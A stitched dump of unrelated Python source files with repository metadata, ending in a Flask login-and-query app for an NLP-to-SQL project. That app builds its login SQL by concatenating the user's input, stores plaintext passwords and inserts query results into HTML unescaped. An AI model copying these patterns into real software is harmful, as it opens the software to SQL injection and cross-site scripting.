logger = logging.getLogger(__name__)
class UserCreationForm(DjangoUserCreationForm):
class Meta(DjangoUserCreationForm.Meta):
model = models.User
fields = ("email",)
field_classes = {"email": UsernameField}
def send_mail(self):
logger.info(
"Sending signup email for email=%s",
self.cleaned_data["email"],
)
message = "Welcome{}".format(self.cleaned_data["email"])
send_mail(
"Welcome to the Store",
message,
"account.manager@store.domain",
[self.cleaned_data["email"]],
fail_silently=True,
)
class AuthenticationForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(
strip=False, widget=forms.PasswordInput
)
def __init__(self, request=None, *args, **kwargs):
self.request = request
self.user = None
super().__init__(*args, **kwargs)
def clean(self):
email = self.cleaned_data.get("email")
password = self.cleaned_data.get("password")
if email is not None and password:
self.user = authenticate(
self.request, email=email, password=password
)
if self.user is None:
raise forms.ValidationError(
"Invalid email/password combination."
)
logger.info(
"Authentication successful for email=%s", email
)
return self.cleaned_data
def get_user(self):
return self.user
|
[
"31276943+Digindataflow@users.noreply.github.com"
] |
31276943+Digindataflow@users.noreply.github.com
|
12d348d7fe7ca51553671f1264e7e363ff72bc1e
|
3b119f8ab6fe8143fd30f84f173e7439b99d2244
|
/Adversarial-Playground-Text-viz/virt/lib/python3.6/site-packages/ebcli/__init__.py
|
2da9cab754255587e11f8f24184749fa9ed2cd71
|
[
"Apache-2.0"
] |
permissive
|
AnupKumarGupta/deepWordBug
|
4952bcfd7b97bd2ce8400bf865704baaf44d2b52
|
c6513e6421fa5204b07652fc3f619b1018696df2
|
refs/heads/master
| 2020-11-25T17:06:30.608123
| 2019-12-18T05:57:54
| 2019-12-18T05:57:54
| 228,767,282
| 0
| 0
|
Apache-2.0
| 2019-12-18T05:46:36
| 2019-12-18T05:46:35
| null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
#!/usr/bin/env python
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
__version__ = '3.15.0'
|
[
"jjf4bz@virginia.edu"
] |
jjf4bz@virginia.edu
|
3053257f100bb3a498cc2c1443c5675748f9d3fa
|
4efe4df9a4348bc8fd137cd17e6dd06130ffbc3a
|
/klasa 3/py/max.py
|
ec31064216cee5fafec31e9d36aee10800c94ed3
|
[] |
no_license
|
arewera290601/mojprojekt
|
5c6f6ba9b9c357697b95d573a80dbc762ae2e1ec
|
3208e87fde89822888646caa319633934e46f672
|
refs/heads/master
| 2022-12-11T02:59:14.517360
| 2020-03-10T07:32:52
| 2020-03-10T07:32:52
| 104,380,604
| 0
| 0
| null | 2022-12-03T00:04:02
| 2017-09-21T17:53:45
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# max.py
#
def main(args):
a = int(input('Podaj 1. liczbę: '))
print(a)
b = int(input('Podaj 2. liczbę: '))
print(b)
c = int(input('Podaj 3. liczbę: '))
print(c)
if b <= a >= c:
print(a,"jest największe")
elif a <= b >=c:
print(b,"jest największe")
else:
print(c,"jest największe")
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
[
"aleksandrarewera@gmail.com"
] |
aleksandrarewera@gmail.com
|
53b69204f5457e823553f9ce84a8956193ef558c
|
110038d9a254bfb4dd6ab8db799e6b9f06053a08
|
/custom_modules/cloud.py
|
f5ca014d9ce4dea5efe30e947e998d4bc060de19
|
[] |
no_license
|
brajenful/voltbot
|
f8db3597d51896813bf32f8de7e8723ba3d243b2
|
eea9717229a5c8fe640491ae16b2cdfcd563ceee
|
refs/heads/master
| 2020-09-12T18:42:17.932262
| 2019-11-18T19:43:15
| 2019-11-18T19:43:15
| 222,513,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23
|
py
|
class Cloud(object):
|
[
"noreply@github.com"
] |
noreply@github.com
|
5c107d3057995ffc314bc3eebe9f4fdb39227a36
|
321e58ab3e6b2385bb3549aaaefd56a58c2a51e7
|
/python/atpic/atcookies.py
|
1d2ea4668a4d530a17d2d2233e73e24b0279454c
|
[] |
no_license
|
alexmadon/atpic_photosharing
|
7829118d032344bd9a67818cd50e2c27a228d028
|
9fdddeb78548dadf946b1951aea0d0632e979156
|
refs/heads/master
| 2020-06-02T15:00:29.282979
| 2017-06-12T17:09:52
| 2017-06-12T17:09:52
| 94,095,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# cookies libary to process
# lang, format, resolution, wiki
# file:///home/madon/doc/python-3.3a0-docs-html/library/http.cookies.html
from http import cookies
C = cookies.SimpleCookie()
C["fig"] = "newton"
C["sugar"] = "wafer"
print(C)
C = cookies.SimpleCookie()
C["rocky"] = "road"
C["rocky"]["path"] = "/cookie"
print(C.output(header="Cookie:"))
print(C["rocky"].value)
print(C.output(header=''))
print(dir(C["rocky"]))
print(C["rocky"].values())
print(C["rocky"].output())
print(C["rocky"].coded_value)
print(C["rocky"].OutputString())
C = cookies.SimpleCookie()
C.load("chips=ahoy; vienna=finger")
print(C.keys())
|
[
"alex.madon@gmail.com"
] |
alex.madon@gmail.com
|
71bc398215f05023c66de7b67055c6c4452211b3
|
71dfa5d568d408fd8464a1313f87c1133e3d061c
|
/ATS/urls.py
|
b3d6e11901bbb899f6983c3d21e1d181763c2df1
|
[] |
no_license
|
harshdonga/Alumni-Tracking-System
|
3819e26e82145ca2cf277c1f260494cb6a6fbd4c
|
f0c836d5fb405f8b61fb73d78acc4c47802a9c11
|
refs/heads/master
| 2020-12-29T17:48:13.989148
| 2020-02-07T04:27:59
| 2020-02-07T04:27:59
| 238,687,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('alumni.urls')),
]
|
[
"harshdonga99@gmail.com"
] |
harshdonga99@gmail.com
|
aee41c0c2c03281e6e8007b3927b19f1257ead15
|
55ed6b1305748eda1466c0420b8d99f43717522b
|
/Visual Studio 2010/CSBasics/Calculator.py
|
402a68ff535d47dc89a692ded3fd73a90e638ecb
|
[] |
no_license
|
2mhk/All-In-One-Code-Framework
|
de53599dd599fd84a9d6a21421336633153bd67e
|
cf711261c52d51d1c9e903d2395d7f200b392743
|
refs/heads/master
| 2022-03-01T21:15:02.668420
| 2019-09-13T14:59:40
| 2019-09-13T14:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
class Calculator:
def Add(self, a, b):
return a + b
def GetCalculator():
return Calculator()
|
[
"jdm7dv@gmail.com"
] |
jdm7dv@gmail.com
|
6fcf96971585787a1fc2e480d331c451935bd745
|
af209804e1d37b9d4343efe2768560f81c925b1f
|
/app.py
|
7922c1de15f33f66b07c19f09c655e92dab5daed
|
[] |
no_license
|
mstoro/nasa_api
|
5ee06e831f188936f0ac72f301acd4305bd4fa57
|
05dd5012315561085664866e32ffa93efae5308f
|
refs/heads/master
| 2023-03-19T22:32:02.094177
| 2021-03-10T14:22:51
| 2021-03-10T14:22:51
| 340,974,711
| 0
| 0
| null | 2021-03-10T14:22:52
| 2021-02-21T18:34:44
|
Python
|
UTF-8
|
Python
| false
| false
| 425
|
py
|
from flask import Flask, jsonify
from api.apod import apod_api
from api.cme import cme_api
from api.errors import BaseError
app = Flask(__name__)
app.config.from_object('config.Config')
app.register_blueprint(apod_api)
app.register_blueprint(cme_api)
@app.errorhandler(BaseError)
def handle_token_errors(error):
app.logger.error(error.json)
return jsonify(error.json)
if __name__ == '__main__':
app.run()
|
[
"mstoro@softserveinc.com"
] |
mstoro@softserveinc.com
|
fc4c4a1cb40afbc6917498e7444d9ab49055ad29
|
6c7a9e4bca9828325219cfca420dae8567bd180d
|
/code/lumar_dataset.py
|
0dd430bc2b617c4d44374b59d012fe47a7016043
|
[] |
no_license
|
PYGang/lumbar_project
|
b91717b6c3174de753da2afb56232c95cd6b0c8f
|
a8531aa3a87237a454ab7ac663906824e487ec06
|
refs/heads/master
| 2022-12-14T23:57:01.848387
| 2020-08-23T06:53:05
| 2020-08-23T06:53:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,203
|
py
|
from torch.utils.data import Dataset
import os
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
import random
import cv2
def dicom_metainfo(dicm_path, list_tag):
'''
获取dicom的元数据信息
:param dicm_path: dicom文件地址
:param list_tag: 标记名称列表,比如['0008|0018',]
:return:
'''
reader = sitk.ImageFileReader()
reader.LoadPrivateTagsOn()
reader.SetFileName(dicm_path)
reader.ReadImageInformation()
return [reader.GetMetaData(t) for t in list_tag]
def dicom2array(dcm_path):
'''
读取dicom文件并把其转化为灰度图(np.array)
https://simpleitk.readthedocs.io/en/master/link_DicomConvert_docs.html
:param dcm_path: dicom文件
:return:
'''
image_file_reader = sitk.ImageFileReader()
image_file_reader.SetImageIO('GDCMImageIO')
image_file_reader.SetFileName(dcm_path)
image_file_reader.ReadImageInformation()
image = image_file_reader.Execute()
if image.GetNumberOfComponentsPerPixel() == 1:
image = sitk.RescaleIntensity(image, 0, 255)
if image_file_reader.GetMetaData('0028|0004').strip() == 'MONOCHROME1':
image = sitk.InvertIntensity(image, maximum=255)
image = sitk.Cast(image, sitk.sitkUInt8)
img_x = sitk.GetArrayFromImage(image)[0]
return img_x
class LumarDataset(Dataset):
def __init__(self,json_file):
super().__init__()
self.json_file = json_file
self.datas = []
self.points = []
self.rois = []
self.wh = []
self.sample_size = 64
self.parse_json()
def __len__(self):
return len(self.rois)
def in_rect(self,p,x,y):
# print(p,x,y)
return all([p[0] > x , p[1] > y , p[0] < x + self.sample_size , p[1] < y + self.sample_size])
# return p[0] > x and p[1] > y and p[0] < x + self.sample_size and p[1] < y + self.sample_size
def __getitem__(self, idx):
roi = self.rois[idx]
img = self.datas[idx]
h,w = img.shape
item_size = self.sample_size
if random.random() < 0.8:
#get item from roi
print(roi[0],min(roi[2],w) - item_size)
xmin = roi[0]
xmax = roi[2] - item_size
if xmin > xmax:
center =int((roi[0] + roi[2])/2)
xmin = max(center - 80,0)
xmax = min(center + 80,w-self.sample_size)
x1 = random.randint(xmin,xmax)
ymin = roi[1]
ymax = roi[3] - item_size
if ymin < ymax:
center = int((roi[1] + roi[3])/2)
ymin = max(center - 80,0)
ymax = min(center + 80, w - self.sample_size)
y1 = random.randint(ymin,ymax)
else:
x1 = random.randint(0,w-item_size)
y1 = random.randint(0,h-item_size)
item_img = img[y1:item_size+y1,x1:x1+item_size]
item_points = []
for p in self.points[idx]:
if self.in_rect(p,x1,y1):
item_points.append(p)
return item_img,item_points
def parse_json(self):
jsonPath = self.json_file
trainPath = os.path.join(os.path.dirname(jsonPath), "train")
annotation_info = pd.DataFrame(columns=('studyUid', 'seriesUid', 'instanceUid', 'annotation'))
json_df = pd.read_json(jsonPath)
for idx in json_df.index:
studyUid = json_df.loc[idx, "studyUid"]
seriesUid = json_df.loc[idx, "data"][0]['seriesUid']
instanceUid = json_df.loc[idx, "data"][0]['instanceUid']
annotation = json_df.loc[idx, "data"][0]['annotation']
row = pd.Series(
{'studyUid': studyUid, 'seriesUid': seriesUid, 'instanceUid': instanceUid, 'annotation': annotation})
annotation_info = annotation_info.append(row, ignore_index=True)
dcm_paths = glob.glob(os.path.join(trainPath, "**", "**.dcm"))
# 'studyUid','seriesUid','instanceUid'
tag_list = ['0020|000d', '0020|000e', '0008|0018']
dcm_info = pd.DataFrame(columns=('dcmPath', 'studyUid', 'seriesUid', 'instanceUid'))
for dcm_path in dcm_paths:
try:
studyUid, seriesUid, instanceUid = dicom_metainfo(dcm_path, tag_list)
row = pd.Series(
{'dcmPath': dcm_path, 'studyUid': studyUid, 'seriesUid': seriesUid, 'instanceUid': instanceUid})
dcm_info = dcm_info.append(row, ignore_index=True)
except:
continue
result = pd.merge(annotation_info, dcm_info, on=['studyUid', 'seriesUid', 'instanceUid'])
# print(result.head())
# result = result.set_index('dcmPath')
result = result.set_index('dcmPath')['annotation']
# print(result.head())
parse_annotations = result
gt_db = []
# for a in anno:
for row in result.iteritems():
image_name = row[0]
img = dicom2array(row[0])
self.wh.append(img.shape)
self.datas.append(img)
# c = c - 1
joints_3d = np.zeros((11, 3), dtype=np.float)
points = row[1][0]['data']['point']
x1 = 100000
y1 = 100000
x2 = 0
y2 = 0
for i, item in enumerate(points):
corrd = item['coord']
joints_3d[i, 0] = corrd[0]
joints_3d[i, 1] = corrd[1]
x1 = min(corrd[0],x1)
y1 = min(corrd[1],y1)
x2 = max(corrd[0],x2)
y2 = max(corrd[1],y2)
self.points.append(joints_3d)
x1 = max(0,x1-20)
y1 = max(0,y1-20)
x2 = min(img.shape[1],x2 + 20)
y2 = min(img.shape[0],y2 + 20)
self.rois.append([x1,y1,x2,y2])
jpath = "/home/wang/PycharmProjects/tianchi/lumbar_train150/lumbar_train150_annotation.json"
test_dataset = LumarDataset(jpath)
for idx,(img,pts) in enumerate(test_dataset):
print(idx,img.shape)
cv2.imshow("img",img)
cv2.waitKey(0)
|
[
"lianjunwang@sf-mail.com"
] |
lianjunwang@sf-mail.com
|
0c22d21f73349427abf47043b7db76828b4a41cf
|
cf7525111bd2a934c1bf9f5d212a2af3f074b1da
|
/temperature_conditionals/temperature_conditionals.py
|
d0930cb011449ddd9563a920280699042f829b32
|
[] |
no_license
|
sealanguage/april2021refresh
|
6f0565b503d729e8083cb61d3645325b3421ab09
|
2aacc00b53f9104e8fd46cc592987a418f5927c7
|
refs/heads/main
| 2023-06-04T19:49:56.025763
| 2021-06-28T01:57:24
| 2021-06-28T01:57:24
| 355,743,010
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
# if temperature is greater than 80
# its a hot day
# otherwise if its less than 40
# its a cold day
# otherwise
# its neither hot nor cold
temperature = 80
if temperature > 80:
print("It's a hot day")
elif temperature < 40:
print("It's a cold day")
else:
print("It's neither hor nor cold")
|
[
"elaine.froehlich@gmail.com"
] |
elaine.froehlich@gmail.com
|
12653a9230e31f36f069346ee3f03bd3ee78ea3b
|
a444b78c28a72a23bf3592822d0a8dcebf4abae1
|
/TEST_6.py
|
c7ab970f202a951f9212623940893f22fe11add8
|
[] |
no_license
|
LordFlashmeow/Using-sorted-file-to-plot-X-axis-scatter-graph-with-corresponding-Y-values-from-the-original-file
|
2aa6b495bc197d54c6d09246c8a26a802f62b1b8
|
01b844f7d86af83aafed15b4b98193c23226ac82
|
refs/heads/master
| 2020-06-12T13:41:55.952119
| 2019-06-26T18:57:15
| 2019-06-26T18:57:15
| 194,318,284
| 0
| 0
| null | 2019-06-28T18:34:29
| 2019-06-28T18:34:28
| null |
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
from matplotlib import pyplot as plt
import numpy as np
from textwrap import wrap
import csv
#Opens the sorted hostnum.csv file and reads it; replaces the quotation marks.
csv_file = []
with open('hostnum.csv', 'r') as host:
for line in host.readlines():
line = line.replace('"', '')
line = line.strip('\n')
rank, value = line.split(" ")
csv_file.append(value)
#Opens the file and reads it
us_csv_file = []
with open('fileFirst.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file.append(line)
us_csv_file1 = []
with open('fileSecond.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file1.append(line)
us_csv_file2 = []
with open('fileThird.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file2.append(line)
#Sorts the files using sorted file's index number - first coumn (x[0])
us_csv_file.sort(key=lambda x: csv_file.index(x[0]))
us_csv_file1.sort(key=lambda x: csv_file.index(x[0]))
us_csv_file2.sort(key=lambda x: csv_file.index(x[0]))
#scatters the symbols on the graph
plt.scatter(range(len(us_csv_file)), [int(item[1]) for item in us_csv_file], c='b', marker='+', label="First")
plt.scatter(range(len(us_csv_file1)), [int(item[1]) for item in us_csv_file1], c='g', marker=(5,2), label="Second")
plt.scatter(range(len(us_csv_file2)), [int(item[1]) for item in us_csv_file2], c='r', marker=(5,1), label="Third")
#indicates the label names at the given spot
plt.legend(loc='upper right')
#Creates grid for x-y axises
plt.grid(True)
#Creates wrapped title for the graph
plt.title("\n".join(wrap("longlonglonglonglonglonglonglonglonglonglonglonglonglongTITLETITLETITLETITLETITLETITLE")),size = 9.5)
#x-y labels for the graph
plt.xlabel("Node Names", fontsize = 8)
plt.ylabel("Run Times", fontsize = 8)
#print(len(csv_file))
#ticks - x and y axisses' data format.
plt.xticks(np.arange(0,len(csv_file)+1)[::20], csv_file[::20], rotation=90, size=8)
plt.yticks(np.arange(0,11000,1000), size=8)
#Saves a PNG file of the current graph to the folder and updates it every time
plt.savefig('./test.png', bbox_inches='tight')
# Not to cut-off bottom labels(manually) - enlarges bottom
plt.gcf().subplots_adjust(bottom=0.23)
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b3b3960ebd3fd7d6bf7249c9d89919297d180f7
|
48fec8e7f098c63271dab124e9c9212045243835
|
/portal/migrations/0002_auto_20200117_1637.py
|
06523f94f717e162470c67083384af39513b4008
|
[] |
no_license
|
JoseGuiFerreira17/blog
|
aa63ad09376c90c15746ddf670b9680c3be61b4b
|
898aafe9822090f5a84216f293e05ab9105537e2
|
refs/heads/master
| 2022-11-16T19:11:58.435979
| 2020-01-20T21:27:50
| 2020-01-20T21:27:50
| 233,690,437
| 0
| 1
| null | 2022-10-31T21:54:48
| 2020-01-13T20:48:11
|
Python
|
UTF-8
|
Python
| false
| false
| 376
|
py
|
# Generated by Django 2.0.13 on 2020-01-17 19:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portal', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='noticia',
name='data_publicacao',
field=models.DateTimeField(),
),
]
|
[
"guibsonmouta15@gmail.com"
] |
guibsonmouta15@gmail.com
|
6520de1e7283c3c146a41702b0b5714a85365863
|
6235f2ac2b43ec57fc778ac32134f66f6217f1fb
|
/day5-2.py
|
b971f59e9a987bd1dd4fc4944abf2dbb2e8f2fe4
|
[] |
no_license
|
jordan-heemskerk/aoc2017
|
2d0df0a056be78b0eb8d404e1cfcd25eb5c760bd
|
d6ae307acad612c6be2dc8ee06805937316a8dd3
|
refs/heads/master
| 2021-08-28T18:37:39.833809
| 2017-12-13T00:09:31
| 2017-12-13T00:09:31
| 113,126,920
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,313
|
py
|
ins = """2
2
-1
1
-1
1
1
-5
-5
-1
0
-8
-2
-11
-4
-5
-10
-4
-9
-9
1
1
-11
-8
-19
-14
-6
-2
-1
-11
-23
-8
-7
-9
-26
-1
-8
-11
-34
0
-22
-17
-41
-12
-43
-33
-15
0
2
-41
-41
-26
-48
-52
-47
-30
-38
-20
-4
-21
-17
-19
-55
-32
-12
-55
1
-34
-8
-15
-59
-56
-16
-23
-43
-5
-41
-56
-32
-67
-14
0
-28
-32
-7
-54
-19
-9
-24
-63
-2
-60
-5
-78
-11
-84
-50
-36
-72
-14
-30
-4
-62
-6
-1
-69
-17
-33
-32
-45
-71
-87
-71
-60
-19
-80
-11
-106
-45
-27
-23
-51
-77
-67
-103
-17
-98
-109
-91
-125
-68
-39
-34
-96
-49
-64
-38
-105
-31
-100
-89
-108
-69
-36
-94
-38
-124
-123
-79
-92
-42
-14
-87
-68
-17
-36
-21
-54
-98
-79
-142
-25
-60
-112
-99
-64
-15
-78
-37
-64
-15
-129
-32
-102
-74
-112
1
-146
-151
-147
-153
-4
-181
-22
-176
-4
-57
-151
-86
-121
-38
-137
-160
-156
-72
-73
-149
-64
-182
-117
-146
-180
-195
-27
-194
-191
-108
-153
-40
-149
-100
-120
-207
-83
-94
-73
-200
-95
-155
-94
-76
-9
-149
-70
-125
-49
-146
-223
-68
-139
-26
-132
-142
-165
-2
-45
-154
-129
-130
-185
-60
-34
-173
-91
-37
-40
-153
-189
-236
-95
-128
-46
-14
-53
-245
-67
-9
-208
-244
-198
-74
-62
-104
-51
-251
-48
-50
-115
-76
-79
-32
-82
-65
-185
-124
-32
-189
-124
-174
1
-273
-223
-275
-238
-200
-184
-229
-195
-152
-63
-150
-73
-44
-54
-187
-49
-250
-192
-290
-282
-266
-214
-117
-199
-83
-104
-251
-176
-262
-296
-39
-259
-87
-132
-166
-67
-194
1
-294
-8
-3
-264
-217
-228
-233
-241
-294
-210
-72
-307
-259
-33
-101
-103
-235
-100
-110
-253
-292
-134
-269
-52
-265
-15
-29
-272
-126
-210
-151
-308
-40
-40
-112
-268
-185
-346
-237
-287
-34
-302
-41
-25
-191
-29
-170
-95
-315
-278
-160
-220
-99
-126
-224
-33
-350
-76
-138
-340
-284
-268
-128
-238
-197
-93
-110
-120
-190
-140
-64
-217
-296
-103
-363
-199
-254
-233
-190
-282
-136
-174
-309
-61
-206
-18
-105
-111
-163
-287
-188
-145
-294
-251
-398
-265
-273
-50
-250
-376
-5
-357
-6
-8
-198
-20
-82
-158
-122
-196
-97
-183
-48
-428
-36
-88
-424
-35
-380
-109
-209
-323
-394
-102
-276
-153
-229
-320
-391
-7
-328
-127
-430
-102
-372
-447
-222
-401
-184
-183
-49
-239
-413
-101
-187
-289
-12
-418
-248
-279
-318
-134
-443
-272
-456
-143
-3
-209
-276
-414
-189
-302
-238
-241
-106
-332
-375
-400
-476
-9
-95
-412
-52
-127
-442
-278
-25
-446
-411
-39
-55
-80
-234
-361
-223
-384
-283
-47
-164
-18
-38
-87
-393
-93
-380
-493
-73
-150
-241
-378
-211
-516
-349
-520
-38
-397
-406
-16
-461
-276
-448
-316
-376
-156
-369
-216
-431
-309
-400
-135
-523
-40
-508
-87
-25
-151
-355
-141
-3
-495
-153
-438
-343
-161
-66
-455
-70
-248
-278
-548
-300
-337
-290
-551
-200
-68
-540
-476
-395
-245
-318
-424
-112
-556
-541
-94
-148
-542
-100
-120
-199
-569
-471
-298
-16
-453
-469
-50
-500
-84
-435
-579
-287
-522
-77
-83
-347
-437
-171
-231
-139
-350
-357
-221
-214
-224
-148
-125
-385
-255
-38
-320
-254
-517
-532
-80
-286
-58
-97
-390
-309
-548
-319
-323
-238
-297
-12
-312
-517
-434
-466
-103
-621
-448
-503
-72
-601
-287
-61
-577
-87
-143
-33
-482
-275
-529
-340
-279
-130
-512
-63
-109
-528
-22
-549
-317
-375
-377
-385
-23
-191
-138
-509
-40
-565
-559
-14
-547
-28
-159
-153
-585
-508
-582
-431
-580
-637
-561
-513
-243
-420
-298
-485
-132
-613
-157
-521
-596
-61
-420
-498
-577
-563
-354
-662
-264
-273
-111
-597
-466
-389
-345
-306
-102
-57
-596
-1
-45
-12
-619
-47
-43
0
-323
-9
-319
-529
-402
-238
-191
-487
-315
-65
-386
-110
-605
-363
-461
-6
-95
-95
2
-596
-454
-618
-83
-481
-283
-386
-247
-417
-707
-564
-603
-17
-712
-140
-336
-567
-443
-36
-476
-251
-735
-589
-198
-197
-476
-49
-736
-422
-383
-569
-732
-1
-104
-261
-352
-453
-273
-344
-66
-307
-698
-158
-238
-280
-207
-624
-491
-765
-506
-146
-616
-711
-650
-655
-393
-19
-315
-311
-572
-675
-533
-156
-373
-744
-142
-582
-491
-796
-777
-125
-483
-426
-510
-560
-700
-778
-407
-440
-409
-238
-738
-477
-147
-152
-317
-110
-323
-788
-601
-202
-517
-487
-726
-300
-1
-554
-448
-15
-191
-531
-568
-466
-527
-132
-254
-290
-8
-400
-655
-788
-376
-249
-662
-315
-378
-41
-793
-163
-29
-327
-839
-133
-124
-129
-673
-32
-605
-393
-664
-374
-135
-366
-717
-93
-601
-763
-788
-494
-802
-282
-443
-491
-461
-197
-83
-96
-162
-97
-161
-232
-144
-472
-118
-429
-387
-724
-789
-636
-298
-484
-720
-526
-382
-102
-449
-846
-525
-547
-696
-524
-272
-843
-286
-247
-838
-447
-489
-797
-483
-386
-775
-340
-772
-158
-293
-256
-432
-812
-273
-93
-487
-264
-594
-330
-712
-798
-131
-591
-539
-677
-455
-470
-108
-573
-57
-845
-383
-273
-890
-747
-913
-648
-625
-650
-544
-137
-490
-434
-734
-182
-355
-859
-835
-141
-536
-874
-102
-940
-359
-83
-800
-894
-712
-470
-687
-578
-435
-935
-400
-780
-814
-458
-892
-481
-371
-761
-348
-388
-891
-764
-297
-536
-695
-314
-336
-978
-379
-462
-597
-533
-561
-9
-474
-292
-560
-420
-828
-721
-769
-874
-157
-495
-771
-899
-571
-98
-282
-233
-203
-982
-416
-142
-993
-540
-979
-851
-506
-238
-292
-184
-695
-195
-632
-575
-962
-76
-546
-705
-13
-271
-222
-124
-380
2
-1003
-251
-525
-228
-644
-159
-624
-477
-912
-712
-343
-263
-88
-745
-85
-374
-675
-804
-610
-854
-511
-612
-964
-731
-358
-495
-946
-466
-364
-1053
-57
-101
-829
-155
-600"""
instructions = [int(k.strip()) for k in ins.split("\n") if k != ""]
steps = 0
curr_idx = 0
while True:
if curr_idx < 0 or curr_idx >= len(instructions):
break
old_idx = curr_idx
curr_idx += instructions[old_idx]
if instructions[old_idx] >= 3:
instructions[old_idx] -= 1
else:
instructions[old_idx] += 1
steps += 1
print steps
|
[
"jheemskerk@urthecast.com"
] |
jheemskerk@urthecast.com
|
ed765f88d3e774913278c6c0f4f26a09b44c2a8c
|
46021d3ecdbfc65c3c75ba760af52b22775244ad
|
/NLP-SQL/NLP-SQL/nlp-sql.py
|
d765287dcc07a7adf0ebe610a1832bd58dde945c
|
[] |
no_license
|
rakshitha1209/DS_Projects
|
7d2f0f42057c534953b716e39b13341fa975c8a9
|
70365368c4b76816c52730f7c0d395d921d0f252
|
refs/heads/master
| 2022-12-16T18:51:31.947836
| 2020-09-15T14:13:35
| 2020-09-15T14:13:35
| 295,747,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,921
|
py
|
from flask import Flask,session,render_template,request,jsonify, redirect,url_for
import main
#importing package to connect flask to mysql database
from flaskext.mysql import MySQL
#flask app
nlpsql = Flask(__name__)
nlpsql.secret_key = 'nlpsql key'
mysql = MySQL(nlpsql)
#database Configuration
nlpsql.config['SQL_DATABASE_DB'] = 'nlpproj'
nlpsql.config['SQL_DATABASE_HOST'] = 'Server'
#start flask app
pyodbc.init_app(nlpsql)
#route for home
@nlpsql.route('/')
def home():
if 'error' in session:
error=session['error']
session.pop('error',None)
else:
error=''
return render_template('login.html',error=error)
#route for getting example pdf
@nlpsql.route('/results')
def returnResultsPDF():
file_name = 'results.pdf'
return redirect(url_for('static', filename='/'.join(['doc', file_name])), code=301)
@nlpsql.route('/logout')
def logout():
session.pop('error',None)
session.pop('access',None)
return redirect('/')
@nlpsql.route('/submitLogin',methods=['POST','GET'])
def processLogin():
username=request.form['username']
password=request.form['password']
query="select access,password from users where userid='"+username+"' ;"
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
print(data)
if(len(data)>0):
access = data[0][0]
session['access'] = access
if(data[0][1]==password):
return redirect('/index')
else:
session['error'] = 'Invalid Username or password'
return redirect('/')
else:
session['error'] = 'Invalid Username or password'
return redirect('/')
@nlpsql.route('/changeAccess',methods=['POST'])
def changeAccess():
userId = request.form['changeAccess']
access = request.form['accessMode']
conn=mysql.connect()
cursor = conn.cursor()
cursor.execute('''UPDATE users SET access=%s WHERE userid=%s;''' ,(access,userId))
conn.commit()
return redirect('/admin')
@nlpsql.route('/signup')
def getSignup():
return render_template('signup.html')
@nlpsql.route('/requestAuthentication',methods=['POST','GET'])
def getdetails():
access=request.form['desig']
access='2'
department=request.form['department']
password=request.form['password']
userId=request.form['userId']
name=request.form['name']
conn=mysql.connect()
cursor = conn.cursor()
cursor.execute('''INSERT INTO users(userid,password,access,name) VALUES (%s,%s,%s,%s);''' ,(userId,password,access,name))
conn.commit()
query="select * from users"
cursor.execute(query)
data = cursor.fetchall()
print(data)
return redirect('/index')
@nlpsql.route('/index')
def getConsole():
if 'access' in session:
access = session['access']
session.pop('access',None)
else:
access=2
return render_template('index.html',access=access)
@nlpsql.route('/admin')
def adminPanel():
query = 'SELECT * FROM users'
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
return render_template('admin.html',data=encodedData)
#getting mysql result for the input query
@nlpsql.route('/submitQuery',methods=['POST'])
def getQuery():
query=request.form['query']
print(query)
#processQuery converts the input query to mysql query
query = main.processQuery(query)
#execute mysql query
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
#converting from unicode to UTF-8
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
#creating html table for Query result
htmlResult="<span class='terminal-text-precommand'>user@snlp-sql</span><span class='terminal-text-command'>:~$ : <span class='terminal-text-command'>"+query+"</span><hr /><table class='table-bordered display-table'>"
for tableRow in encodedData:
htmlResult=htmlResult+"<tr>"
for tablecell in tableRow:
htmlResult=htmlResult+"<td>"+str(tablecell)+"</td>"
htmlResult=htmlResult+"</tr>"
htmlResult=htmlResult+"</table>"
#converts html to jason format
return jsonify(htmlResult)
#to get Student database similar to getQuery
@nlpsql.route('/showStudentDetails',methods=['POST'])
def showStudentDetails():
query="select * from student"
query = main.processQuery(query)
cursor = mysql.connect().cursor()
